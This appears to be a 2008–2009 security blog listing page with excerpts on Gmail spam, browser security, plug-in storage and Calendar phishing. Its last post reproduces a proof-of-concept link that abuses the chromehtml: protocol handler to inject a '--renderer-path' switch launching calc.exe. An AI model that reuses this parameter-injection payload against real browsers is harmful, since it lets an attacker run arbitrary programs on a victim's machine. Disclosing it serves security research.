Tuesday, January 6th, 2009 According to this eWeek article, Google has been named the #3 spam provider in the world according to the most recent Spamhaus Statistics.They are stating the reason as "Spammers have had success cracking the CAPTCHA tests and creating Gmail accounts from which to spam. Because the spam comes from a ...
Posted in Internet, Privacy | No Comments
Sunday, January 4th, 2009 This document is meant to provide web application developers, browser engineers, and information security researchers with a one-stop reference to key security properties of contemporary web browsers. Insufficient understanding of these often poorly-documented characteristics is a major contributing factor to the prevalence of several classes of security vulnerabilities.Although all browsers ...
Posted in Coding, Internet, Security | No Comments
Wednesday, December 31st, 2008 By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...
Posted in Coding, Internet, Privacy, Security | No Comments
Monday, December 29th, 2008 In his blog, Graham Cluley of Sophos alerts his readers to the return of Google Calendar phishing attacks. Originally spotted in the summer, Google Calendar phishing uses event invitations to Calendar users asking them to "Verify Your Account" or face account deletion. Victims of this phish are asked to accept ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008 Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.htmlclick the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
